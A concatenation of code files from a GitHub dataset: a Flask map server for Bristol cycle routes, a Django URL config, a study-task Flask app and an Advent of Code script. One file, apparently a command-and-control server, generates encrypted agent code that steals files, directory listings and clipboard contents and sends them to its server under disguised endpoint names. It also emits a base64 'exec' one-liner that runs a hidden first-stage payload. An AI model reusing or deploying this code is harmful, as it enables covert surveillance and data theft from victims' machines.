\"Egilsstadir\", \"is_stop_location\": True},\n {\"lat\": 66.0427545, \"long\": -17.3624953, \"name\": \"Husavik\", \"is_stop_location\": True},\n {\"lat\": 65.659786, \"long\": -20.723364, \"is_stop_location\": False},\n {\"lat\": 65.3958953, \"long\": -20.9580216, \"name\": 
\"Hvammstangi\", \"is_stop_location\": True},\n {\"lat\": 65.0722555, \"long\": -21.9704238, \"is_stop_location\": False},\n {\"lat\": 65.0189519, \"long\": -22.8767959, \"is_stop_location\": False},\n {\"lat\": 64.8929619, \"long\": -23.7260926, \"name\": \"Olafsvik\", \"is_stop_location\": True},\n {\"lat\": 64.785334, \"long\": -23.905765, \"is_stop_location\": False},\n {\"lat\": 64.174537, \"long\": -21.6480148, \"name\": \"Mosfellsdalur\", \"is_stop_location\": True},\n {\"lat\": 64.0792223, \"long\": -20.7535337, \"name\": \"Minniborgir\", \"is_stop_location\": True},\n {\"lat\": 64.14586, \"long\": -21.93955, \"name\": \"Reykjavik\", \"is_stop_location\": True},\n]\n\nBRISTOL_CENTRE = [51.520921,-2.248806]\n\n@app.route('/mapbox_js')\ndef mapbox_js():\n\n route_data = get_sustrans_data();\n\n #route_data, waypoints = get_route_data(route)\n #stop_locations = create_stop_locations_details(route)\n\n return render_template('mapbox_js.html', \n ACCESS_KEY=MAPBOX_ACCESS_KEY,\n route_data=route_data,\n map_centre=BRISTOL_CENTRE\n #,stop_locations = stop_locations\n )\n\n# Mapbox driving direction API call\nROUTE_URL = \"https://api.mapbox.com/directions/v5/mapbox/driving/{0}.json?access_token={1}&overview=full&geometries=geojson\"\n\nBCC_URL = \"https://opendata.bristol.gov.uk/api/records/1.0/search/?dataset={0}&rows={1}&geofilter.distance={2}%2C{3}%2C{4}\"\n\ndef create_route_url(route):\n # Create a string with all the geo coordinates\n lat_longs = \";\".join([\"{0},{1}\".format(point[\"long\"], point[\"lat\"]) for point in route])\n # Create a url with the geo coordinates and access token\n url = ROUTE_URL.format(lat_longs, MAPBOX_ACCESS_KEY)\n return url\n\ndef convert_coords(coord):\n inProj = Proj('epsg:3857')\n outProj = Proj('epsg:4326')\n x2,y2 = transform(inProj,outProj,coord[0],coord[1])\n return [x2, y2]\n\ndef get_route_data(route_list):\n # Get the route url\n route_data = []\n waypoints = []\n for route in route_list:\n #print(len(route))\n if len(route) < 25:\n data = send_route_request(route)\n else:\n data = {}\n route_key = \"routes\"\n #print(data.keys())\n if route_key in data.keys():\n #print(\"Not none\")\n geometry = data[\"routes\"][0][\"geometry\"]\n print(geometry)\n route_data.append(Feature(geometry = geometry, properties = {}))\n waypoints.append(data[\"waypoints\"])\n else:\n # split the coordinates and make the requests again\n #print(\"Split\")\n if \"message\" in data.keys():\n print(data[\"message\"])\n half = len(route)//2\n route_data_2, waypoints_2 = get_route_data([route[:half], route[half:]])\n route_data = route_data + route_data_2\n waypoints = waypoints + waypoints_2\n return route_data, waypoints\n\ndef send_route_request(route):\n route_url = create_route_url(route)\n # Perform a GET request to the route API\n result = requests.get(route_url)\n if result.status_code == 429:\n print(\"Too many requests error - wait for 10 seconds\")\n time.sleep(10)\n send_route_request(route)\n # Convert the return value to JSON\n json_result = result.json()\n if type(json_result) is dict:\n return json_result\n else:\n return json.loads(json_result)\n\ndef create_stop_locations_details(route_list):\n stop_locations = []\n for route in route_list:\n for location in route:\n # Skip anything that is not a stop location\n if not location[\"is_stop_location\"]:\n continue\n # Create a geojson object for stop location\n point = Point([location['long'], location['lat']])\n properties = {\n 'title': location['name'],\n 'icon': 'campsite',\n 'marker-color': 
'#3bb2d0',\n 'marker-symbol': len(stop_locations) + 1\n }\n feature = Feature(geometry = point, properties = properties)\n stop_locations.append(feature)\n return stop_locations\n\ndef get_sustrans_data():\n #coords = convert_coords(BRISTOL_CENTRE)\n # Get the route url\n url = BCC_URL.format(\"sustrans-cycle-network\", \"5000\", BRISTOL_CENTRE[0], BRISTOL_CENTRE[1], 1000000)\n # Perform a GET request to the route API\n result = requests.get(url)\n # Convert the return value to JSON\n data = result.json()\n # Create a geo json object from the routing data\n records = data[\"records\"]\n route_data = []\n for record in records:\n coordinates = record[\"fields\"][\"geo_shape\"][\"coordinates\"]\n #for coordinates in coordinates_list:\n route_data.append(convert_to_geojson(record, coordinates))\n return route_data\n\ndef convert_to_route(record, coordinates):\n route = []\n for coord in coordinates:\n route.append({\"lat\": coord[1], \"long\": coord[0], \"name\": record[\"fields\"][\"description\"], \"is_stop_location\": False});\n return route\n\ndef convert_to_geojson(record, coordinates):\n geometry = {\"type\": \"LineString\", \"coordinates\":coordinates}\n feature = Feature(geometry = geometry, properties = {\"name\": record[\"fields\"][\"description\"]})\n return feature", "repo_name": "hfa224/bristoldata_python", "sub_path": "server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 6626, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "flask.Flask", "line_number": 9, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 48, "usage_type": "call"}, {"api_name": "pyproj.Proj", "line_number": 68, "usage_type": "call"}, {"api_name": "pyproj.Proj", "line_number": 69, "usage_type": "call"}, {"api_name": "pyproj.transform", "line_number": 70, "usage_type": "call"}, {"api_name": "geojson.Feature", "line_number": 89, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 105, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 108, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 115, "usage_type": "call"}, {"api_name": "geojson.Point", "line_number": 125, "usage_type": "call"}, {"api_name": "geojson.Feature", "line_number": 132, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 141, "usage_type": "call"}, {"api_name": "geojson.Feature", "line_number": 161, "usage_type": "call"}]} +{"seq_id": "22884375033", "text": "import base64\nimport config\nimport Logic.Agents.AgentsLogic as agentLogic\nimport Logic.Commands.CommandsLogic as commandLogic\nfrom Utils.Exceptions.NotFoundException import NotFoundException\nfrom Logic.Commands.Commands import Action\nfrom Utils import CryptoUtils\nfrom Utils import StringUtils\nfrom cryptography.fernet import Fernet\nimport Gateways.WebSocketCybClientGateway as webSocketCybClientGateway\n\nHTTP_PREFIX = 'http://'\nFIRST_PACKET_SUFFIX = 'login'\nLIST_FILES_SUFFIX = 'recommendations'\nDOWNLOAD_FILES_SUFFIX = 'map'\nCLIPBOARD_SUFFIX = 'countryInfo'\nDEFAULT_SUFFIX = 'maps'\nDISCONNECT_SUFFIX = 'personalRecommendations'\n\n\nasync def prepare_code_for_agent(ip_address: str):\n command = commandLogic.get_oldest_command_by_ip(ip_address)\n agent = agentLogic.get_agent_by_ip_address(ip_address)\n if command and agent:\n if command.action == Action.FILE_DOWNLOAD:\n with open('AgentCodes/UploadFile.txt', 'r') as file:\n data = file.read()\n data = data.replace('$key', 
agent.encryption_key)\n data = data.replace('$cookie', agent.cookie)\n data = data.replace('$file_name', command.parameters[\"fileName\"])\n data = data.replace('$command_id', str(command.id))\n data = data.replace('$url', f'{HTTP_PREFIX}{config.server_ip}/{DOWNLOAD_FILES_SUFFIX}')\n\n encoded_data = CryptoUtils.encode_ascii(data)\n compressed_data = CryptoUtils.compress(encoded_data)\n return CryptoUtils.encrypt(compressed_data, agent.encryption_key)\n\n if command.action == Action.LIST_FILES:\n with open('AgentCodes/ListFiles.txt', 'r') as file:\n data = file.read()\n data = data.replace('$key', agent.encryption_key)\n data = data.replace('$cookie', agent.cookie)\n data = data.replace('$dir_path', command.parameters[\"dir_path\"])\n data = data.replace('$command_id', str(command.id))\n data = data.replace('$url', f'{HTTP_PREFIX}{config.server_ip}/{LIST_FILES_SUFFIX}')\n\n encoded_data = CryptoUtils.encode_ascii(data)\n compressed_data = CryptoUtils.compress(encoded_data)\n return CryptoUtils.encrypt(compressed_data, agent.encryption_key)\n\n if command.action == Action.DISCONNECT:\n with open('AgentCodes/LastPacket.txt', 'r') as file:\n data = file.read()\n data = data.replace('$key', agent.encryption_key)\n data = data.replace('$cookie', agent.cookie)\n data = data.replace('$url', f'{HTTP_PREFIX}{config.server_ip}/{DISCONNECT_SUFFIX}')\n data = data.replace('$command_id', str(command.id))\n\n encoded_data = CryptoUtils.encode_ascii(data)\n compressed_data = CryptoUtils.compress(encoded_data)\n return CryptoUtils.encrypt(compressed_data, agent.encryption_key)\n\n if command.action == Action.CLIPBOARD_MONITOR:\n with open('AgentCodes/SendSimplePacketWithClipboard.txt', 'r') as file:\n data = file.read()\n data = data.replace('$key', agent.encryption_key)\n data = data.replace('$cookie', agent.cookie)\n data = data.replace('$url', f'{HTTP_PREFIX}{config.server_ip}/{DEFAULT_SUFFIX}')\n\n with open('AgentCodes/SendClipboard.txt', 'r') as file:\n send_clipboard_data = file.read()\n send_clipboard_data = send_clipboard_data.replace('$key', agent.encryption_key)\n send_clipboard_data = send_clipboard_data.replace('$cookie', agent.cookie)\n send_clipboard_data = send_clipboard_data.replace('$duration', str(command.parameters[\"duration\"]))\n send_clipboard_data = send_clipboard_data.replace('$command_id', str(command.id))\n send_clipboard_data = send_clipboard_data.replace('$url', f'{HTTP_PREFIX}{config.server_ip}/{CLIPBOARD_SUFFIX}')\n\n message_bytes = send_clipboard_data.encode('ascii')\n base64_bytes = base64.b64encode(message_bytes)\n base64_data = base64_bytes.decode('ascii')\n\n data = data.replace('$base64_send_clipboard', base64_data)\n\n encoded_data = CryptoUtils.encode_ascii(data)\n compressed_data = CryptoUtils.compress(encoded_data)\n\n await webSocketCybClientGateway.send_message(f\"Starting monitoring clipboard, scheduled in command {command.id}\")\n\n return CryptoUtils.encrypt(compressed_data, agent.encryption_key)\n elif agent:\n with open('AgentCodes/SendSimplePacket.txt', 'r') as file:\n data = file.read()\n data = data.replace('$key', agent.encryption_key)\n data = data.replace('$cookie', agent.cookie)\n data = data.replace('$url', f'{HTTP_PREFIX}{config.server_ip}/{DEFAULT_SUFFIX}')\n\n encoded_data = CryptoUtils.encode_ascii(data)\n compressed_data = CryptoUtils.compress(encoded_data)\n return CryptoUtils.encrypt(compressed_data, agent.encryption_key)\n\n return generate_random_message()\n\n\ndef generate_random_message():\n data = 
StringUtils.generate_random_string(50)\n key = Fernet.generate_key()\n encoded_data = CryptoUtils.encode_ascii(data)\n compressed_data = CryptoUtils.compress(encoded_data)\n return CryptoUtils.encrypt(compressed_data, key.decode('UTF-8'))\n\n\ndef generate_first_code_for_agent(ip_address: str):\n agent = agentLogic.get_agent_by_ip_address(ip_address)\n if agent is None:\n raise NotFoundException('Agent with given ip address not found')\n\n with open('AgentCodes/StartingPacket.txt', 'r') as file:\n data = file.read()\n\n data = data.replace('$key', agent.encryption_key)\n data = data.replace('$cookie', agent.cookie)\n data = data.replace('$url', f'{HTTP_PREFIX}{config.server_ip}/{FIRST_PACKET_SUFFIX}')\n\n message_bytes = data.encode('ascii')\n base64_bytes = base64.b64encode(message_bytes)\n base64_data = base64_bytes.decode('ascii')\n\n cmd_string = f\"python3 -c \\\"import base64; exec(base64.b64decode(\\'{base64_data}\\'))\\\"\"\n return cmd_string\n\n", "repo_name": "Kuba12a/CyberServer", "sub_path": "Logic/Request/RequestLogic.py", "file_name": "RequestLogic.py", "file_ext": "py", "file_size_in_byte": 6059, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "Logic.Commands.CommandsLogic.get_oldest_command_by_ip", "line_number": 22, "usage_type": "call"}, {"api_name": "Logic.Commands.CommandsLogic", "line_number": 22, "usage_type": "name"}, {"api_name": "Logic.Agents.AgentsLogic.get_agent_by_ip_address", "line_number": 23, "usage_type": "call"}, {"api_name": "Logic.Agents.AgentsLogic", "line_number": 23, "usage_type": "name"}, {"api_name": "Logic.Commands.Commands.Action.FILE_DOWNLOAD", "line_number": 25, "usage_type": "attribute"}, {"api_name": "Logic.Commands.Commands.Action", "line_number": 25, "usage_type": "name"}, {"api_name": "config.server_ip", "line_number": 32, "usage_type": "attribute"}, {"api_name": "Utils.CryptoUtils.encode_ascii", "line_number": 34, "usage_type": "call"}, {"api_name": "Utils.CryptoUtils", "line_number": 34, "usage_type": "name"}, {"api_name": "Utils.CryptoUtils.compress", "line_number": 35, "usage_type": "call"}, {"api_name": "Utils.CryptoUtils", "line_number": 35, "usage_type": "name"}, {"api_name": "Utils.CryptoUtils.encrypt", "line_number": 36, "usage_type": "call"}, {"api_name": "Utils.CryptoUtils", "line_number": 36, "usage_type": "name"}, {"api_name": "Logic.Commands.Commands.Action.LIST_FILES", "line_number": 38, "usage_type": "attribute"}, {"api_name": "Logic.Commands.Commands.Action", "line_number": 38, "usage_type": "name"}, {"api_name": "config.server_ip", "line_number": 45, "usage_type": "attribute"}, {"api_name": "Utils.CryptoUtils.encode_ascii", "line_number": 47, "usage_type": "call"}, {"api_name": "Utils.CryptoUtils", "line_number": 47, "usage_type": "name"}, {"api_name": "Utils.CryptoUtils.compress", "line_number": 48, "usage_type": "call"}, {"api_name": "Utils.CryptoUtils", "line_number": 48, "usage_type": "name"}, {"api_name": "Utils.CryptoUtils.encrypt", "line_number": 49, "usage_type": "call"}, {"api_name": "Utils.CryptoUtils", "line_number": 49, "usage_type": "name"}, {"api_name": "Logic.Commands.Commands.Action.DISCONNECT", "line_number": 51, "usage_type": "attribute"}, {"api_name": "Logic.Commands.Commands.Action", "line_number": 51, "usage_type": "name"}, {"api_name": "config.server_ip", "line_number": 56, "usage_type": "attribute"}, {"api_name": "Utils.CryptoUtils.encode_ascii", "line_number": 59, "usage_type": "call"}, {"api_name": 
"Utils.CryptoUtils", "line_number": 59, "usage_type": "name"}, {"api_name": "Utils.CryptoUtils.compress", "line_number": 60, "usage_type": "call"}, {"api_name": "Utils.CryptoUtils", "line_number": 60, "usage_type": "name"}, {"api_name": "Utils.CryptoUtils.encrypt", "line_number": 61, "usage_type": "call"}, {"api_name": "Utils.CryptoUtils", "line_number": 61, "usage_type": "name"}, {"api_name": "Logic.Commands.Commands.Action.CLIPBOARD_MONITOR", "line_number": 63, "usage_type": "attribute"}, {"api_name": "Logic.Commands.Commands.Action", "line_number": 63, "usage_type": "name"}, {"api_name": "config.server_ip", "line_number": 68, "usage_type": "attribute"}, {"api_name": "config.server_ip", "line_number": 76, "usage_type": "attribute"}, {"api_name": "base64.b64encode", "line_number": 79, "usage_type": "call"}, {"api_name": "Utils.CryptoUtils.encode_ascii", "line_number": 84, "usage_type": "call"}, {"api_name": "Utils.CryptoUtils", "line_number": 84, "usage_type": "name"}, {"api_name": "Utils.CryptoUtils.compress", "line_number": 85, "usage_type": "call"}, {"api_name": "Utils.CryptoUtils", "line_number": 85, "usage_type": "name"}, {"api_name": "Gateways.WebSocketCybClientGateway.send_message", "line_number": 87, "usage_type": "call"}, {"api_name": "Gateways.WebSocketCybClientGateway", "line_number": 87, "usage_type": "name"}, {"api_name": "Utils.CryptoUtils.encrypt", "line_number": 89, "usage_type": "call"}, {"api_name": "Utils.CryptoUtils", "line_number": 89, "usage_type": "name"}, {"api_name": "config.server_ip", "line_number": 95, "usage_type": "attribute"}, {"api_name": "Utils.CryptoUtils.encode_ascii", "line_number": 97, "usage_type": "call"}, {"api_name": "Utils.CryptoUtils", "line_number": 97, "usage_type": "name"}, {"api_name": "Utils.CryptoUtils.compress", "line_number": 98, "usage_type": "call"}, {"api_name": "Utils.CryptoUtils", "line_number": 98, "usage_type": "name"}, {"api_name": "Utils.CryptoUtils.encrypt", "line_number": 99, "usage_type": "call"}, {"api_name": "Utils.CryptoUtils", "line_number": 99, "usage_type": "name"}, {"api_name": "Utils.StringUtils.generate_random_string", "line_number": 105, "usage_type": "call"}, {"api_name": "Utils.StringUtils", "line_number": 105, "usage_type": "name"}, {"api_name": "cryptography.fernet.Fernet.generate_key", "line_number": 106, "usage_type": "call"}, {"api_name": "cryptography.fernet.Fernet", "line_number": 106, "usage_type": "name"}, {"api_name": "Utils.CryptoUtils.encode_ascii", "line_number": 107, "usage_type": "call"}, {"api_name": "Utils.CryptoUtils", "line_number": 107, "usage_type": "name"}, {"api_name": "Utils.CryptoUtils.compress", "line_number": 108, "usage_type": "call"}, {"api_name": "Utils.CryptoUtils", "line_number": 108, "usage_type": "name"}, {"api_name": "Utils.CryptoUtils.encrypt", "line_number": 109, "usage_type": "call"}, {"api_name": "Utils.CryptoUtils", "line_number": 109, "usage_type": "name"}, {"api_name": "Logic.Agents.AgentsLogic.get_agent_by_ip_address", "line_number": 113, "usage_type": "call"}, {"api_name": "Logic.Agents.AgentsLogic", "line_number": 113, "usage_type": "name"}, {"api_name": "Utils.Exceptions.NotFoundException.NotFoundException", "line_number": 115, "usage_type": "call"}, {"api_name": "config.server_ip", "line_number": 122, "usage_type": "attribute"}, {"api_name": "base64.b64encode", "line_number": 125, "usage_type": "call"}]} +{"seq_id": "2639036916", "text": "\"\"\"monthly_prj URL Configuration\n\nThe `urlpatterns` list routes URLs to views. 
For more information please see:\n https://docs.djangoproject.com/en/4.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import include, re_path, path\nfrom app.views import (\n get_data,\n get_data_eda,\n get_data_search,\n get_data_search_result,\n get_data_platform_search,\n get_community,\n get_data_search_detail1,\n get_data_search_detail2,\n)\n\nurlpatterns = [\n path(\"data_schema/\", get_data),\n path(\"data_eda/\", get_data_eda),\n path(\"data_search/\", get_data_search),\n path(\"data_search_result/\", get_data_search_result),\n path(\"data_search_detail1/\", get_data_search_detail1),\n path(\"data_search_detail2/\", get_data_search_detail2),\n path(\"data_platform_search/\", get_data_platform_search),\n path(\"community/\", get_community),\n re_path(r\"^admin/\", admin.site.urls),\n re_path(r\"^app/\", include(\"app.urls\")),\n re_path(r\"^\", include(\"app.urls\")),\n]\n", "repo_name": "Paul-scpark/Data-planet", "sub_path": "ETRI/etri_django/monthly_prj/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1465, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.urls.path", "line_number": 30, "usage_type": "call"}, {"api_name": "app.views.get_data", "line_number": 30, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 31, "usage_type": "call"}, {"api_name": "app.views.get_data_eda", "line_number": 31, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 32, "usage_type": "call"}, {"api_name": "app.views.get_data_search", "line_number": 32, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 33, "usage_type": "call"}, {"api_name": "app.views.get_data_search_result", "line_number": 33, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 34, "usage_type": "call"}, {"api_name": "app.views.get_data_search_detail1", "line_number": 34, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 35, "usage_type": "call"}, {"api_name": "app.views.get_data_search_detail2", "line_number": 35, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 36, "usage_type": "call"}, {"api_name": "app.views.get_data_platform_search", "line_number": 36, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 37, "usage_type": "call"}, {"api_name": "app.views.get_community", "line_number": 37, "usage_type": "argument"}, {"api_name": "django.urls.re_path", "line_number": 38, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 38, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 38, "usage_type": "name"}, {"api_name": "django.urls.re_path", "line_number": 39, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 39, "usage_type": "call"}, {"api_name": "django.urls.re_path", "line_number": 40, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 40, "usage_type": "call"}]} +{"seq_id": 
"16799605733", "text": "'''\n\tThis appy has changed to incorporate external JS code for perceptual decision - making task running on the same api\n\tApril 2020 VS for covid19 study \n'''\nimport os\nimport logging\n\nimport warnings\nimport subprocess\nfrom flask_cors import CORS\nfrom flask import Flask, jsonify, request, abort, Response, make_response, render_template \n\nfrom models.db import db\nfrom models.install import install_models\n\nfrom config import config \n\n\n# to test well functioning : https://udecmac.osc-fr1.scalingo.io/testmethod\nwarnings.filterwarnings(\"ignore\")\n\n\n# Database setup\n# from db import db_session\n# from models import Task \n# from config import config\n\n# Set up logging\nlogfilepath = os.path.join(os.path.dirname(os.path.abspath(__file__)),\n config.get(\"Server Parameters\", \"logfile\"))\n# --- Logging ---- # \nloglevels = [logging.DEBUG, logging.INFO, logging.WARNING, logging.ERROR, logging.CRITICAL]\nloglevel = loglevels[config.getint(\"Server Parameters\", \"loglevel\")]\nlogging.basicConfig( filename=logfilepath, format='%(asctime)s %(message)s', level=loglevel )\n\n# constants\nCODE_VERSION = config.get('Task Parameters', 'code_version')\n\n\napp = Flask(__name__)\n\n# -------------------------\n# --- DB configuration ---- \n# -------------------------\napp.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get('DATABASE_URL')\n# app.config['SQLALCHEMY_DATABASE_URI'] = config.get('Database Parameters','database_url')\n# 'mysql://root:pwd@localhost/covid19' # maybe put in the cofig \n\ndb.init_app(app)\nCORS(app)\n\nwith app.app_context():\n install_models()\n import routes\n\n\n#----------------------------------------------\n# ExperimentError Exception, for db errors, etc.\n#----------------------------------------------\n\n# Possible ExperimentError values. MODIFY \nexperiment_errors = dict(\n status_incorrectly_set = 1000,\n prolific_study_participant_longit_id_not_set = 1001,\n tried_to_quit = 1011,\n intermediate_save = 1012,\n improper_inputs = 1013,\n page_not_found = 404,\n in_debug = 2005,\n unknown_error = 9999\n)\n\nclass ExperimentError(Exception):\n \"\"\"\n Error class for experimental errors, such as subject not being found in\n the database.\n \"\"\"\n def __init__(self, value):\n self.value = value\n self.errornum = experiment_errors[self.value]\n def __str__(self):\n return repr(self.value)\n def error_page(self, request):\n return render_template('error.html',\n errornum=self.errornum,\n **request.args)\n\n@app.errorhandler(ExperimentError)\ndef handleExpError(e):\n \"\"\"Handle errors by sending an error page.\"\"\"\n return e.error_page( request )\n\n\n# @app.teardown_request\n# def shutdown_session(exception=None):\n# db_session.remove()\n\n# --- TESTING THE SERVER IS WORKING -----------\n@app.route('/testmethod', methods=['GET', 'POST'])\ndef mytest():\n result = dict()\n result['test'] = 'ok'\n return jsonify(result), 200\n\n@app.route('/')\ndef regularpage(pagename=None):\n \n \"\"\"\n Important!: you need this part to make the sequential page working via showpages! 
\n \"\"\"\n if pagename==None:\n raise ExperimentError('page_not_found')\n return render_template(pagename)\n\n\n# @app.teardown_request\n# def shutdown_session(exception=None):\n# db_session.remove()\n\n\n###########################################################\n# let's start\n###########################################################\n \nif __name__ == '__main__':\n print(\"Starting webserver.\")\n port = int(os.environ.get(\"PORT\", 5000)) \n app.run(host=\"0.0.0.0\", port=port,debug=config.getboolean('Server Parameters', 'debug'))\n\n\t\n", "repo_name": "vasilisa/udecmac-api", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 3908, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "warnings.filterwarnings", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 29, "usage_type": "call"}, {"api_name": "config.config.get", "line_number": 30, "usage_type": "call"}, {"api_name": "config.config", "line_number": 30, "usage_type": "name"}, {"api_name": "logging.DEBUG", "line_number": 32, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 32, "usage_type": "attribute"}, {"api_name": "logging.WARNING", "line_number": 32, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 32, "usage_type": "attribute"}, {"api_name": "logging.CRITICAL", "line_number": 32, "usage_type": "attribute"}, {"api_name": "config.config.getint", "line_number": 33, "usage_type": "call"}, {"api_name": "config.config", "line_number": 33, "usage_type": "name"}, {"api_name": "logging.basicConfig", "line_number": 34, "usage_type": "call"}, {"api_name": "config.config.get", "line_number": 37, "usage_type": "call"}, {"api_name": "config.config", "line_number": 37, "usage_type": "name"}, {"api_name": "flask.Flask", "line_number": 40, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 45, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 45, "usage_type": "attribute"}, {"api_name": "models.db.db.init_app", "line_number": 49, "usage_type": "call"}, {"api_name": "models.db.db", "line_number": 49, "usage_type": "name"}, {"api_name": "flask_cors.CORS", "line_number": 50, "usage_type": "call"}, {"api_name": "models.install.install_models", "line_number": 53, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 84, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 86, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 86, "usage_type": "name"}, {"api_name": "flask.request", "line_number": 91, "usage_type": "argument"}, {"api_name": "flask.jsonify", "line_number": 103, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 113, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 127, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 127, "usage_type": "attribute"}, {"api_name": "config.config.getboolean", "line_number": 128, "usage_type": "call"}, {"api_name": "config.config", "line_number": 128, "usage_type": "name"}]} +{"seq_id": "36451892939", "text": "from typing import List, Tuple, Dict\nfrom pathlib import Path\nfrom collections import Counter, defaultdict\n\n\ndef 
read_input(filename: str) -> Tuple[str, Dict[str, str]]:\n    path_to_input = Path(__file__).parent / filename\n    with open(path_to_input) as f:\n        content = f.readlines()\n\n    content = [row.strip(\"\\n\") for row in content]\n    polymer = content[0]\n\n    rules = [row.split(\" -> \") for row in content[2:]]\n    rules = {row[0]: row[1] for row in rules}\n    return polymer, rules\n\n\ndef get_char_counts(\n    polymer: str, rules: Dict[str, str], num_iter: int\n) -> Dict[str, int]:\n    \"\"\"Find the character counts for the final polymer. \n\n    Instead of building up the actual consecutive polymers, we can simply keep \n    track of the counts of the chars that make up the polymers. \n    \n    To count the numbers of each character, we simply increment the count for\n    each character in the key in the pair_count dictionary. Note that this will\n    double count the elements *in the middle*. But not the start and end \n    characters. So to fix this, we will have to add one count for each of them. \n    Thanks to @DaniellVan for spotting this. \n\n    Example:\n    If our template is \"NNCB\" and the rules state: \n    {\n        \"NN\" -> \"C\"\n        ...\n    }\n    we know that the first pair: \"NN\" should become: \"NCN\".\n    Since \"NN\" appears once, we know that the new substrings will have counts:\n    \"NC\" : 1\n    \"CN\" : 1\n\n    Args:\n        polymer: the template polymer\n        rules: the mappings from pairs to single chars\n        num_iter: number of iterations we should build the polymer. \n\n    Returns:\n        The counts for each character in the final polymer after \n        `num_iter` steps. \n    \"\"\"\n    pair_counts = defaultdict(int)\n    char_counts = defaultdict(int)\n\n    for pair in zip(polymer[:-1], polymer[1:]):\n        pair_counts[\"\".join(pair)] += 1\n\n    for _ in range(num_iter):\n        temp = defaultdict(int)\n        for pair, count in pair_counts.items():\n            middle = rules[pair]\n            temp[pair[0] + middle] += count\n            temp[middle + pair[1]] += count\n\n        pair_counts = temp\n\n    for pair, count in pair_counts.items():\n        char_counts[pair[0]] += count\n        char_counts[pair[1]] += count\n\n    char_counts[polymer[0]] += 1\n    char_counts[polymer[-1]] += 1\n\n    return char_counts\n\n\ndef part_1(polymer: str, rules: Dict[str, str]) -> int:\n    char_counts = get_char_counts(polymer, rules, 10)\n    return (max(char_counts.values()) - min(char_counts.values())) // 2\n\n\ndef part_2(polymer: str, rules: Dict[str, str]) -> int:\n    char_counts = get_char_counts(polymer, rules, 40)\n    return (max(char_counts.values()) - min(char_counts.values())) // 2\n\n\nif __name__ == \"__main__\":\n    polymer, rules = read_input(\"input.txt\")\n    print(f\"part 1: {part_1(polymer, rules)}\")\n    print(f\"part 2: {part_2(polymer, rules)}\")\n", "repo_name": "steffenvan/advent_of_code", "sub_path": "day14/day14.py", "file_name": "day14.py", "file_ext": "py", "file_size_in_byte": 2939, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pathlib.Path", "line_number": 7, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 6, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 6, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 20, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 53, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 54, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 60, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 21, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 78, 
